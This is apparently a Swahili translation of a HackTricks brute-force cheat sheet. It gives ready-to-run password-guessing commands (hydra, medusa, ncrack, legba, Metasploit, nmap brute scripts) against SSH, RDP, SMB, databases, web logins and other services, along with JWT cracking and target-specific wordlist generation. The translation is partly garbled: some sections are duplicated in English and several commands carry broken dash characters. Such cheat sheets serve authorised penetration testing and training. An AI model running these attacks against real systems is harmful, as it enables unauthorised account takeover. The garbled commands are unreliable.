Brute Force - CheatSheet

Tumia Trickest kujenga na kutumia workflows kwa urahisi zinazotumia zana za jamii ya juu zaidi duniani. Pata Ufikiaji Leo:

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Vitambulisho vya Kimsingi

Tafuta kwenye google vitambulisho vya msingi vya teknolojia inayotumiwa, au jaribu viungo hivi:

Tengeneza Dictionaries Yako Mwenyewe

Pata habari nyingi kuhusu lengo kama unavyoweza na tengeneza orodha ya maneno ya kipekee. Zana zinazoweza kusaidia:

Crunch

crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)

@ Lower case alpha characters
, Upper case alpha characters
% Numeric characters
^ Special characters including spac
crunch 6 8 -t ,@@^^%%

Cewl

Cewl ni zana inayotumiwa kwa ufanisi kwenye uchunguzi wa kijamii. Inachambua maandishi kwenye ukurasa wa wavuti na kujenga orodha ya maneno muhimu kwa ajili ya mashambulizi ya nguvu.

cewl example.com -m 5 -w words.txt

Unda nywila kulingana na maarifa yako kuhusu muathiriwa (majina, tarehe...)

python3 cupp.py -h

Chombo cha kuzalisha orodha ya maneno, kinachokuwezesha kutoa seti ya maneno, ukiruhusu kutengeneza mabadiliko mengi kutoka kwa maneno yaliyotolewa, kujenga orodha ya maneno ya kipekee na bora kutumia kuhusiana na lengo maalum.

python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst

__          _______  _____ _______ ______ _____
\ \        / /_   _|/ ____|__   __|  ____|  __ \
\ \  /\  / /  | | | (___    | |  | |__  | |__) |
\ \/  \/ /   | |  \___ \   | |  |  __| |  _  /
\  /\  /   _| |_ ____) |  | |  | |____| | \ \
\/  \/   |_____|_____/   |_|  |______|_|  \_\

Version 1.0.3                    Cycurity

Generating wordlist...
[########################################] 100%
Generated 67885 lines.

Finished in 0.920s.

Orodha ya Maneno

Tumia Trickest kujenga na kutumia hatua za kiotomatiki zinazotumia zana za jamii zilizo za juu zaidi duniani. Pata Ufikiaji Leo:

Huduma

Zimepangwa kwa herufi kwa utaratibu wa jina la huduma.

AFP

nmap -p 548 --script afp-brute <IP>
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> set PASS_FILE <PATH_PASSWDS>
msf> set USER_FILE <PATH_USERS>
msf> run

AJP

AJP ni itifaki ya kawaida inayotumiwa kwa mashambulizi ya nguvu kubwa.

nmap --script ajp-brute -p 8009 <IP>

AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace)

legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]

Cassandra

Cassandra ni mfumo wa kuhifadhi wa Open Source NoSQL unaotumika kwa kuhifadhi data kwenye seva nyingi. Inaweza kudumu kwa muda mrefu na inaweza kushughulikia mzigo mkubwa wa data.

nmap --script cassandra-brute -p 9160 <IP>
# legba ScyllaDB / Apache Casandra
legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042

CouchDB

CouchDB ni mfumo wa usimamizi wa database ambao unaweza kushambuliwa kwa kutumia mbinu ya nguvu ya brute. Kwa kufanya hivyo, unaweza kujaribu kuingia kwa kutumia majina ya mtumiaji maarufu kama "admin" na kujaribu nywila mbalimbali hadi upate ufikiaji.

msf> use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /

Usajili wa Docker

hydra -L /usr/share/brutex/wordlists/simple-users.txt  -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/

Elasticsearch

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /

FTP

FTP

hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21

Kukokotoa Kwa Nguvu ya Kawaida ya HTTP

Uthibitishaji wa Msingi wa HTTP

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for https
medusa -h <IP> -u <username> -P  <passwords.txt> -M  http -m DIR:/path/to/auth -T 10
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/

HTTP - NTLM

legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/

HTTP - Tuma Fomu

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for https

Kwa https lazima ubadilishe kutoka "http-post-form" hadi "https-post-form"

HTTP - CMS -- (W)ordpress, (J)oomla au (D)rupal au (M)oodle

cmsmap -f W/J/D/M -u a -p a https://wordpress.com
# Check also https://github.com/evilsocket/legba/wiki/HTTP

IMAP

IMAP (Internet Message Access Protocol) is a standard email protocol that stores email messages on a mail server. When a user reads an email message using IMAP, the message is not downloaded to the user's computer; instead, it remains on the server. This allows users to access their email from multiple devices as long as they are connected to the internet.

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>
legba imap --username user --password data/passwords.txt --target localhost:993

IRC

IRC

IRC (Internet Relay Chat) is a widely used protocol for real-time text messaging. It is commonly used for online group discussions, team collaboration, and sometimes even for malicious purposes. IRC servers host various channels where users can join to communicate with others on specific topics.

IRC

IRC (Internet Relay Chat) ni itifaki inayotumika sana kwa ujumbe wa maandishi wa wakati halisi. Mara nyingi hutumika kwa majadiliano ya kikundi mtandaoni, ushirikiano wa timu, na mara chache hata kwa madhumuni mabaya. Seva za IRC hutoa njia mbalimbali ambapo watumiaji wanaweza kujiunga ili kuwasiliana na wengine kuhusu mada maalum.

nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>

ISCSI

nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>

JWT

#hashcat
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt

#https://github.com/Sjord/jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt

#John
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256

#https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py -d wordlists.txt <JWT token>

#https://github.com/brendan-rius/c-jwt-cracker
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8

#https://github.com/mazen160/jwt-pwn
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt

#https://github.com/lmammino/jwt-cracker
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6

LDAP

LDAP (Lightweight Directory Access Protocol) ni itifaki inayotumiwa sana kwa kudhibiti na kupata data kwenye mfumo wa saraka.

nmap --script ldap-brute -p 389 <IP>
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match

MQTT

MQTT

ncrack mqtt://127.0.0.1 --user test –P /root/Desktop/pass.txt -v
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt

Mongo

Mongo

nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login
legba mongodb --target localhost:27017 --username root --password data/passwords.txt

MSSQL

MSSQL ni mfumo wa usimamizi wa database uliotengenezwa na Microsoft. Inaweza kuhitaji mbinu za kuvunja kama vile brute force kwa kujaribu maneno ya siri hadi kupata ufikiaji.

legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433

MySQL

MySQL

# hydra
hydra -L usernames.txt -P pass.txt <IP> mysql

# msfconsole
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false

# medusa
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql

#Legba
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306

OracleSQL

OracleSQL

patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017

./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt

#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>

#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORTS 1521
msf> set SID <SID>

#for some reason nmap fails sometimes when executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>

legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt

Ili kutumia oracle_login na patator unahitaji kufunga:

pip3 install cx_Oracle --upgrade

Brute force ya hash ya OracleSQL nje ya mtandao (toleo 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, na 11.2.0.3):

nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30

POP

POP

POP

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V

# Insecure
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:110

# SSL
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl

PostgreSQL

PostgreSQL

hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres
ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432

PPTP

Unaweza kupakua pakiti ya .deb kufunga kutoka https://http.kali.org/pool/main/t/thc-pptp-bruter/

sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter –u <Username> <IP>

RDP

RDP ni itifaki inayotumiwa kwa kawaida kwa mbali kudhibiti kompyuta za Windows. Mbinu ya kawaida ya kuvunja ni kujaribu kuingia kwa nguvu kwa kutumia orodha ya maneno au tarakimu hadi kupata nywila sahihi. Unaweza kutumia zana kama Hydra au Medusa kutekeleza mashambulizi ya nguvu. Kumbuka kwamba kuvunja RDP ni kinyume cha sheria na inaweza kusababisha hatua za kisheria dhidi yako.

ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain <RDP_DOMAIN>] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]

Redis

Redis

msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 <IP>
hydra –P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]

Rexec

Rexec ni itifaki ya mbali ambayo inaruhusu mtumiaji kufanya amri za mbali kwenye mfumo wa kompyuta.

hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V

Rlogin

Rlogin ni itifaki ya mbali inayotumiwa kuingia kwa mbali kwenye mfumo wa kompyuta.

hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V

Rsh

Rsh ni itifaki ya mbali inayotumika kwa kuingia kwa mbali kwenye mifumo ya Unix. Kwa sababu ya udhaifu wake wa usalama, Rsh haipaswi kutumiwa kwenye mazingira ya uzalishaji.

hydra -L <Username_list> rsh://<Victim_IP> -v -V

http://pentestmonkey.net/tools/misc/rsh-grind

Rsync

nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>

RTSP

RTSP

hydra -l root -P passwords.txt <IP> rtsp

SFTP

SFTP (Secure File Transfer Protocol) ni itifaki salama ya kuhamisha faili ambayo inatumia usimbuaji kati ya mteja na seva.

legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22

SNMP

SNMP

msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp

SMB

SMB

SMB ni itifaki ya mfumo wa faili inayotumiwa sana kwa kushirikiana faili na printa kwenye mtandao. Wakati mwingine, unaweza kutaka kufanya mashambulizi ya nguvu kwa kutumia SMB kama njia ya kupata ufikiaji usioidhinishwa kwenye mfumo. Kwa kufanya hivyo, unaweza kutumia zana za kawaida za kufanya mashambulizi ya nguvu kama Hydra au Medusa. Kumbuka kwamba kufanya mashambulizi ya nguvu bila idhini ni kinyume cha sheria na inaweza kusababisha madhara makubwa.

nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup <SMB_WORKGROUP>] [--smb-share <SMB_SHARE>]

SMTP

SMTP

hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism <mech>]

SOCKS

SOCKS ni itifaki inayotumiwa kwa kusudi la kusafirisha data kupitia firewall, na inaweza kutumika kwa njia ya kuficha anwani ya IP ya mtumiaji.

nmap  -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
# With alternative address
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080

SQL Server

SQL Server

#Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT

SSH

SSH

hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
legba ssh --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22

Funguo dhaifu za SSH / Debian PRNG inayoweza kutabirika

Baadhi ya mifumo ina kasoro zinazojulikana katika mbegu ya nasibu inayotumika kuzalisha vifaa vya kryptographia. Hii inaweza kusababisha nafasi ndogo sana ya funguo ambayo inaweza kubomolewa kwa kutumia zana kama snowdroppe/ssh-keybrute. Sets zilizotangulia kuzalishwa za funguo dhaifu pia zinapatikana kama g0tmi1k/debian-ssh.

STOMP (ActiveMQ, RabbitMQ, HornetQ na OpenMQ)

Itifaki ya maandishi ya STOMP ni itifaki ya ujumbe inayotumiwa sana ambayo inaruhusu mawasiliano laini na mwingiliano na huduma maarufu za foleni za ujumbe kama RabbitMQ, ActiveMQ, HornetQ, na OpenMQ. Inatoa njia iliyostandardiwa na yenye ufanisi wa kubadilishana ujumbe na kutekeleza shughuli mbalimbali za ujumbe.

legba stomp --target localhost:61613 --username admin --password data/passwords.txt

Telnet

Telnet ni itifaki ya mtandao inayotumika kuingia kijijini kwenye mfumo wa kompyuta au kifaa kingine cha mtandao. Inaweza kutumika kama njia ya kufanya mashambulizi ya nguvu kwa kujaribu maneno ya siri tofauti kwa kuingia kijijini kwa lazima.

hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet

legba telnet \
--username admin \
--password wordlists/passwords.txt \
--target localhost:23 \
--telnet-user-prompt "login: " \
--telnet-pass-prompt "Password: " \
--telnet-prompt ":~$ " \
--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin

VNC

VNC

hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> –u root -P /root/Desktop/pass.txt –M vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0
use auxiliary/scanner/vnc/vnc_login
nmap -p 5900,5901 --script vnc-brute --script-args brute.credfile=wordlist.txt <IP>
legba vnc --target localhost:5901 --password data/passwords.txt

#Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS <ip>
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst

Winrm

Winrm ni itifaki ya mbali inayotumiwa kwa usimamizi wa vifaa vya Windows.

crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt

Tumia Trickest kujenga na kutumia workflows kwa urahisi zaidi zinazotumia zana za jamii ya juu zaidi duniani. Pata Ufikiaji Leo: